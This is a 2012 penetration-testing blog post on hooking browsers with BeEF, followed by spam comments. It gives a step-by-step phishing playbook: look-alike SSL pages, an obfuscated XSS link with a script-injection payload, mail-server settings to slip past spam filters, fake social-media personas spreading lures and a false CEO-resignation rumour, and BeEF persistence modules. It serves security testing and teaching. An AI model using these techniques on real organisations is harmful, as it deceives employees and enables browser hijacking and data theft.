Monday, May 21, 2012

BeEF In a Real World Pen Test - Part 2: Tasty BeEF nuggets, line, hook and sinker (Social Engineering to get a hook)

In the first part of this series, we explained pre-hooking basics for reaching the maximum number of targets. In this post, we will go through the hooking process; taking into consideration the different social and technical aspects to hook the target’s browsers for as long as possible.

Preparing The Line
During recon of our target,, we harvested a few e-mails, and infiltrated some social media outlets. Some tips from the conversations we observed between employees led us to the non-official Facebook group for Contoso. Here, we learned that an internal football tournament is held yearly in a nearby stadium. It's organized by an internal "Sports Committee." 

We even found some pictures of last year's winners holding a trophy. We also spotted a couple of people talking about internal e-mails with special discounts on sunglasses as part of an employee benefit program.

On Twitter, we found a couple of interesting hash tags: #screwContosoBoard with quite a bit of anger from employees towards Contoso's management and board of directors.

We also bought a phishing domain "" and a valid SSL certificate for it. Finally, quick web vulnerability scanning identified a reflected cross-site scripting(XSS) vulnerability on Contoso's main website.

We will use this information to build our hooking strategy. We want to use our phishing domains and XSS exploit links to lure browsers at three main frontiers: Corporate email, Facebook and Twitter.

Preparing The Hook
First, we set the hook on our phishing page. It should have the same anatomy of the original website (Header, footer, side panes, CSS, ...etc), served on our “secure” SSL enabled phishing page on  We'll add a loading progress bar in the middle pane and put up a user friendly message that says "this page might take some time to load." We'll set up the progress bar with an inverse exponential decaying function. The Javascript code below is an example of the progress code that can be used.

totalProgress = 100;
currentProgress = 1.0;

while (currentProgress < totalProgress)
    currentProgress =  currentProgress + (Math.exp(currentProgress  / -3) );

Disclaimer: None of this code is taken from the Windows file copying progress bar module, any similarities in function is a mere coincidence!

By going fast at the beginning, and slower towards the end, our hope is the visitor should feel encouraged, safe, and be less likely to close the page out of boredom. We even hope the user will switch tabs, leaving this in the background to load, and give us a longer chance to hook and do our BeEFY tricks.

Second, we prepare our XSS exploit link. The XSS Javascript exploit should inject BEeF’s hook into the vulnerable page. The exploit link should rewrite the center pane of the vulnerable page to remove any original content and add the loading progress bar. It should look identical to our phishing domain. This should decrease the probability of the victim noticing anything wrong and maximize the time he will stay hooked. Furthermore, we can use some basic link obfuscation to trick savvy victims. This can be achieved by forcing URL encoding for the whole value of the vulnerable parameter (including readable text). For example, the query parameter:

search=”<script src=”test.js”> 

should look like:


Also, URL shortening services can be a good tool for hiding the main link. They are very common for use on social networks, especially on Twitter.

Hooking Grounds
The first hooking ground we target is corporate email. We need to get our hands on a sample from Contoso’s internal email to make our phishing emails look more convincing. We want to match internal email anatomy (headers, fonts, text colors, signatures, ...etc). 

We'll need to do some more social engineering. We use our fictional profile to go into the conversation about the sunglasses and ask for more details. Posing as a clueless new employee of Contoso, we receive a couple of responses about how the discount works. We take the discussion away from the public group to a private one-on-one conversation with the most friendly respondents, and ask them to forward the email to a non-corporate email under the ruse that our corporate email is not fully active yet. 

Bingo! Now that we have the email, we craft a new one having the same anatomy of the sample we have, announcing the launch of a new football tournament. The email should appear to come from the sports committee and should have in the “to” field the same group name as the one from the original discount email. In the email body, we salute last year’s winners and add their picture with the trophy for a more convincing flavor; assuring people about the authenticity of the email. 

And of course, we end the email with a “find out more” link that points to our hook. 

Since we have two hooking strategies, we split our targets into two sets. To one, we send links pointing to phishing hook. To the other set, we send links pointing to the XSS hook. It’s noteworthy to mention that we need to tweak our server while sending phishing emails. We want to make sure we don't end up in the recipients' spam folders.

  • The server name is should be set correctly to match the sending domain name.
  • The reverse PTR record of the phishing domain name should match the server’s IP.
  • There should be an SPF record allowing the IP of our server to send emails using the phishing domain. This is a good SPF record builder from Microsoft.
  • Make sure that the server’s ISP IP blocks are not on any email spam blacklists. This is a handy free online blacklist checker.

These are all common tactics mail filters check for to identify spam.

The next hooking ground we target is social networking. We start by participating in group conversations and rants about work environment, politics, ...etc. but never in a direct conversation to keep our secret identity. Keeping our opinion with the flow also prevents controversial discussions that may trigger alarms. The target of this phase is to get people familiar with our display names popping on their news feed, so they don’t feel it’s odd when they see a link as our first interaction. After a day or two of interactivity, we start the fun! We send a few buzzing words with a link to check the details. Buzzing social network announcements have to rely on psychological need for a wide range of employees. This can be found from what people are saying about their company on Facebook and twitter. At Contoso, based on what we found, we thought of a few good buzzing messages:

  • On twitter, we tweet ”OMG! <CEO name> has resigned! Embarrassing video <hook link> #screwContosoBoard” with retweets from different accounts.
  • On Facebook, on the non-official group we broadcast the following buzzing messages from different fake profiles and maybe choose one of them to be shared on the wall some of the fake profiles:
    • “Big bonus for referral to this vacancy <hook link>, do you know anyone?”
    • “Sign with us this petition to demand a salary raise <hook link>. Be positive and we will make a  difference!”

We might even get to the secret cow level if we combine social engineering with physical materials that links to the hook. Good examples include:

  • Fill Contoso near-by streets with Stickers having a QR code with the XSS exploit link.
  • Distribute ad-like flyers in front of Contoso’s HQ with a short URL to the phishing page.

Adding Sinkers
Now that we have some people clicking links and getting hooked, we need to keep them hooked for as long as possible. Our sinking strategy relies on social engineering in addition to two helping modules in BeEF.

The greatest sinker of all is how we engineer the phishing/XSS pages to convince the people to stay more. As mentioned earlier, the progress bar is a good trick. When combined with suitably entertaining animations, it would do the job.

The pop-under module serves as a good persistence technique as well. We set its configuration to auto-run (from it’s corresponding config.yaml) such that it runs whenever a user is hooked. The module attempts to open a small pop-under window that to keep the browser hooked even if the user closes the main tab. Be careful, though, sometimes this gets blocked by pop-up blockers.

We also want to use the man-in-the-browser module. We'll set this to auto-run as well. This ensures that, whenever the zombie clicks on any link on the phishing page, the next page will still be hooked. Someone would have to manually type a new address in the address bar to get away from our hook.

Finally, we use the "frame-above" module wich is the best option for persistence if we are dealing with IE. It basically rewrites all links on the webpage to spawn a 100% by 100% iFrame with a source relative to the selected link; allowing ultra persistence. Michele "antisnatchor" Orru, BeEF's Lead Core Developer, talked about an Ultra cool way to automate the whole process at AthCon 2012 and even created a Ruby script that utilizes our latest REST API to do Java 1.6.0u27 mass pwnage!

In the next post, we will talk about how to do the real fun: exfiltrate sensitive data, hop into the internal network, and common pen test practices to limit the scope and prevent counter attacks.


  1. employee benefit trust

    Legallly reduce corporation tax and avoid income tax with the successor to the Emplyee Benefit Trust (EBT) the EFRBS II. Employee Benefit Trusts.Announcement of a settlement opportunity for the users of Employee Benefit trusts, to obtain certainty quicker than by waiting for the results of litigation

  2. The future of software testing is on positive note. It offers huge career prospects for talented professionals to be skilled software testers. software testing course in Chennai | Software Testing Training in Chennai | Software testing course in Chennai

  3. Thanks for sharing a valuable article, please keep sharing such more articles.
    Best Selenium training in Chennai
    Selenium training in Chennai

  4. Are you looking for best website to download eBook torrents for free? Then EbookShare will be the right place. kovalanj

  5. This is a comprehensive post. I recommend this topic.This site has lots of interest concepts.I found several important things from this site. It supports me in many ways.Thanks for supporting this again.
    Hadoop Training in Chennai | Selenium Training in Chennai | Software Testing Training in Chennai | Java Training in Chennai

  6. The infinity of software testing is on the accurate note. It contributes huge career forecasts for talented specialists to be skilled software testers.Thanks for the very gradually information.
    Selenium Training in Chennai | Selenium Training Institute in Chennai

  7. Nice article, interesting to read , keep more post seo training

  8. I simply wanted to write down a quick word to say thanks to you for those wonderful tips and hints you are showing on this site.
    Best Hadoop Training Institute In chennai

  9. This blog will help to get more ideas. This is very helpful for Software Testing learners. Thank you for sharing this wonderful site.
    Software Testing Training in Chennai | Software Training Institutes in Chennai | Software Testing Courses in Chennai | Testing Courses in Chennai

  10. This article provides the information about Java its key features and scope for java professionals. This information is really helpful me to know more about Java programming language.
    bsc projects in chennai | eee projects in chennai

  11. It's interesting that many of the bloggers to helped clarify a few things for me as well as giving.Most of ideas can be nice content.The people to give them a good shake to get your point and across the command.
    advanced java training in chennai | struts training in chennai.


  12. Awesome Post!

    Thanks for sharing very useful can refer best Robotics training in chennai | Silver light training in chennai.

  13. I believe there are many more pleasurable opportunities ahead for individuals that looked at your site.

    python training in Chennai

  14. Thank you for posting this beneficial content material. You provided another one great article in msc project centers in chennai. I hope this information may change my business carrier.I can remember these things whenever taking the decision in realtime mini projects in chennai.

  15. Yiioverflow presenting one of the best and high performance PHP framework. Fast, secure and extremely professionals are developing applications. We guide to implement mobile app development and SOA hybrid applications.Code in Nodejs, Angular,Ionic,ReactJS and Yiiframework.

  16. This was an nice and amazing and the given contents were very useful and the precision has given here is good.
    Digital Marketing Training in Chennai

  17. very informative article.hope you will keep your sharing
    Python Training in Chennai

  18. PhD Thesis Writing Services

    Dissertation Writing Services

    Research paper Writing Service

    Master Thesis Writing Service

    thesis writing service

  19. This is really an awesome one thanks to the author for a wonderful sharing.
    AWS Training Course in chennai